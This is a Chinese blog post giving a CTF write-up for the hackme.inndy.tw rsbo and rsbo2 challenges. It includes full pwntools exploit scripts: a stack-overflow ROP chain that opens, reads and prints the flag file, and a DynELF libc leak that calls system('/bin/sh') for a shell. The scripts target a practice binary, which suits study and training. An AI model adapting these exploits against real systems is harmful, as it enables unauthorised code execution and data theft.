rsbo和rsbo2的wp

最新推荐文章于 2022-09-12 10:08:25 发布
最新推荐文章于 2022-09-12 10:08:25 发布
阅读量1.6k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78620566
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rsbo和rsbo2这两个题目感觉还不错,我把wp分享出来,方便大家学习
rsbo的题目要求是: 

nc hackme.inndy.tw 7706
Tips: ROP, open, read

把rsbo直接拖入ida中
main函数:
image
init函数:
image
这个程序首先在init函数中读取了flag文件到buf中,然后通过将buf中数据全部清空,然后进入到main函数中你能输入0x80个字节的数据到buf中,下面的for循环会随机破坏buf中数据,这会使你的exp在一定概率下会使程序崩溃,最后程序通过write把buf中数据输出,这个程序其实还是一个利用栈溢出的题目
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,这时ROP就有应用空间了
经过简单的探测,可以发现只要输入112个\x00就刚刚好覆盖到main函数的返回地址,为了读取到flag,首先要用open函数打开,然后用read来读,最后用write来显示出来
我的exp是:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x08048729'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

flag_addr=0x080487D0

pop_pop_ret=0x0804879e # pop edi ; pop ebp ; ret
pop_pop_pop_ret=0x0804879d # pop esi ; pop edi ; pop ebp ; ret

start_addr=0x08048490


elf = ELF('/home/h11p/hackme/rsbo')
open_addr=elf.plt["open"]
read_addr=elf.plt["read"]
write_addr=elf.plt["write"]
bss_addr=elf.bss()

#io = process('/home/h11p/hackme/rsbo')

io = remote('hackme.inndy.tw',7706)

'''
payload1 = "\x00"*108+p32(open_addr)+p32(pop_pop_ret)+p32(flag_addr)+p32(0)+p32(start_addr)
payload2 = "\x00"*108+p32(read_addr)+p32(start_addr)+p32(3)+p32(bss_addr)+p32(0x60)
payload3 = "\x00"*108+p32(write_addr)+p32(pop_pop_pop_ret)+p32(1)+p32(bss_addr)+p32(0x60)
'''
payload1=fit({108: p32(open_addr)+p32(pop_pop_ret)+p32(flag_addr)+p32(0)+p32(start_addr)}, filler = '\x00')
payload2=fit({108: p32(read_addr)+p32(start_addr)+p32(3)+p32(bss_addr)+p32(0x60)}, filler = '\x00')
payload3=fit({108: p32(write_addr)+p32(pop_pop_pop_ret)+p32(1)+p32(bss_addr)+p32(0x60)}, filler = '\x00')
#debug()
io.send(payload1)
io.send(payload2)
io.send(payload3)
io.interactive()

io.close()

解释payload1

payload1=fit({108: p32(open_addr)+p32(pop_pop_ret)+p32(flag_addr)+p32(0)+p32(start_addr)}, filler = '\x00')

首先fit函数的官方说明在http://docs.pwntools.com/en/stable/util/packing.html?highlight=fit,fit是一个填充函数,参数中的字典参数{key:value},其中key是填充的位置,value是填充的数据,filler是剩下位置填充的数据,我的payload1调用的是open函数,调用完成之后利用pop pop ret把栈中参数清空,使栈保持平衡,最后让程序调回程序的开头,也就是start位置p32(start_addr),这样程序在下次溢出的时候就可以利用read函数把文件内容读出来了
解释payload2: 

payload2=fit({108: p32(read_addr)+p32(start_addr)+p32(3)+p32(bss_addr)+p32(0x60)}, filler = '\x00')

这里是程序的第二次溢出,利用溢出执行read(3,bss,60)就是把读到的文件内容存到bss段

解释payload3: 

payload3=fit({108: p32(write_addr)+p32(pop_pop_pop_ret)+p32(1)+p32(bss_addr)+p32(0x60)}, filler = '\x00')

这里是程序的第三次溢出,利用溢出执行write(1,bss,60)就是把bss段的flag显示出来,同事为了不让程序崩溃,执行完write之后利用pop_pop_pop_ret使程序栈保持平衡
最后的效果是
image

rsbo2:
程序要求是:

nc hackme.inndy.tw 7706
Get shell please. Tips: stack migration
http://bruce30262.logdown.com/posts/301623-csaw-ctf-2015-autobots

由于rsbo和rsbo2程序是一个程序,rsbo2的要求就是getshell
所以我参考http://blog.csdn.net/smalosnail/article/details/53386353,由于上面这个文章中题目和rsbo2基本一样,都是利用write这个函数泄露内存中的关键信息,然后利用这些关键信息得到程序的基地址,libc版本,libc基地址,system函数的地址等,所以我的exp也和上面这个链接的差不多 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x08048729'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

elf = ELF('/home/h11p/hackme/rsbo')
open_addr=elf.plt["open"]
read_addr=elf.plt["read"]
write_addr=elf.plt["write"]
bss_addr=elf.bss()

io = process('/home/h11p/hackme/rsbo')

#io = remote('hackme.inndy.tw',7706)

start_addr=0x08048490
main_addr=0x0804867F
flag_addr=0x080487D0
pop_pop_ret=0x0804879e # pop edi ; pop ebp ; ret
pop_pop_pop_ret=0x0804879d # pop esi ; pop edi ; pop ebp ; ret

def leak(address):
    payload1 = "\x00" * 108 + p32(write_addr)+p32(start_addr) + p32(1) + p32(address) + p32(4)
    io.send(payload1)
    data = io.recv(4)
    log.info("%#x => %s" % (address, (data or '').encode('hex')))
    return data


#debug(addr=hex(read_addr))

d = DynELF(leak, elf=elf)
system_addr= d.lookup('system', 'libc')

print "system:"+hex(system_addr)
print "bss:"+hex(bss_addr)

payload2 = "\x00" * 108 + p32(read_addr) + p32(start_addr) + p32(0) + p32(bss_addr) + p32(9)
payload3 = "\x00" * 108 + p32(system_addr) + p32(start_addr) + p32(bss_addr)

io.send(payload2)
io.sendline("/bin/sh\0")
io.send(payload3)
io.interactive()

io.close()

由于rsbo中for循环会随机破坏内存,所以如果脚本会经常崩溃,在网络好情况下,基本反复尝试十几次就可以getshell了,效果是
image

niexinming
关注
专栏目录
Pwn学习历程(1)--基本工具、交互、调试
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
pwntools, terminal =‘tmux‘ 报错
qq_41667316的博客
07-05 1511
pwntools, terminal =‘tmux’ 报错 Traceback (most recent call last): File “exp.py”, line 4, in gdb.attach§ File “/home/ /pwn/pwn/lib/python3.8/site-packages/pwnlib/context/init.py”, line 1543, in setter return function(*a, **kw) File “/home/ /pwn/pwn/lib/pyt
rsbo-1和rsbo-2的writeup
zszcr的博客
04-22 501
rsdo和rsdo-2writeup 这两道题的文件是一样的,不过一个没要求getshell,一个要求getshll 先说rsdo 防护机制 只开启了堆栈不可执行 题目hint: ROP, open, read 很明显要要用ROP调用执行open()函数打开flag文件 然后用read()函数读取文件 ida反编译代码 ** 它先执行init函数 ,打开“/home/ct...
[CSAW‘22] 世界这么大
weixin_52640415的博客
09-12 1868
CSAW 2022
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 645
因为rsborsbo2是同一题,所以就直接做rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样做的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
hackme.inndy rsbo2 经验总结
qq_43189757的博客
08-07 300
这题想用retdl-resolve 来解题,可是自己手写的脚本过不了,搜过其他的wp,发现有很多种解法,利用DynELF泄露libc地址, 或利用write直接泄露libc地址(题目给了libc),但是我就是想用栈迁移和retdl-resolve解题,但是搜到的wp几乎都用了roputils工具,这工具我不会用也没搜到什么教程,然后经过一段时间的无能狂怒之后最后决定求人不如求己,自己去看roput...
基于OAuth2.O的资源共享机制RSBO (2012年)
05-07
本文针这些问题,提出了一种基于OAuth2.0协议的资源共享机制RSBO(Resource Sharing based OAuth2.0)并对其进行阐述,RSBO利用OAuth2.0协议认证授权的访问令牌原理,为共享资源创建资源令牌,该机制解决了用户信息泄露及...
SAP BW学习资料
09-03
2. BWCCMS:SAP BI监视器,提供对SAP BW系统性能和健康状况的监控。 3. CHANGERUNMONI:变更运行监控器,用于跟踪和管理SAP BW中的数据加载和处理步骤。 4. DB02:表和索引监视器,用于检查数据库的健康状态,包括...
SAP 资料,关于sap 事 物代码
09-09
**应用场景**:在设计报表和分析模型时,RSD2帮助用户定义和配置关键指标,支持更有效的数据分析。 #### RSD3 - 单位维护 **功能概述**:RSD3用于维护单位对象。单位用于定义关键指标的计量单位,如数量、金额等。 ...
hackme.inndy.tw的一些Writeup(5月30更新)
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
2017湖湘杯pwn300的wp
一个码农的笔记
12-03 1090
湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10143408 把pwn300直接拖入ida中: main函数: add函数: 这个题目很有意思,首先开辟一个3到255大小的堆空间,然后做加减乘除的计算之后把计算结果放入堆中,最后可以把所有
pwntools 简单用法
xuqi7
05-07 3219
官方一个示例 remote.py   """ Example showing how to use the remote class. """ from pwn import * # 也可以直接 import pwn sock = remote('127.0.0.1', 9001) # 连接远程服务 print sock.recvline() # ...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
一道有趣的关于nodejs的ctf题
一个码农的笔记
12-24 3万+
首先,出题背景是公司要求我出一道简单的ctf题目,正好我最近在学习nodejs相关的东西,于是我就出了这道题目,题目源码,我已经打包上传到了GitHub上,如果有兴趣,可以下载下来,研究一下 这个题目开局是一个登陆页面 在这里你会想到什么呢?爆破?nononono~ 你要想到的是这是一道nodejs的题目啊,js本身就是一种弱类型语言,所以,你可以改变数据类型,来看看它会不会产生非预期的效果,你...
Linux下pwn从入门到放弃
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
http://web1.sycsec.com/b33804a7301e583ca6a473c1c092b09f/
一个码农的笔记
10-13 6865
# -*- coding: utf-8 -*- import string import urllib2 import urllib apt=string.printable[:-6] def httpsend(baopo): data={} baopofirst="SYC" data[baopofirst+baopo]="1" url="http://web1.s
echo和echo2的wp
一个码农的笔记
11-12 5715
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 echo的要求是 nc hackme.inndy.tw 7711 Tips: format string vulnerability这个题目提示了是格式化字符串漏洞,所以先了解一下啥是格式化漏洞,参考 http://www.freeb
mysql order by注入技巧
一个码农的笔记
11-05 4987
select user from user order by user,If((1=1),1,(select user from mysql.user)) desc; http://www.2cto.com/Article/201305/209335.html 记一下,免得忘了
rop和rop2的题目的wp
一个码农的笔记
10-17 4499
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个题目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/100
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值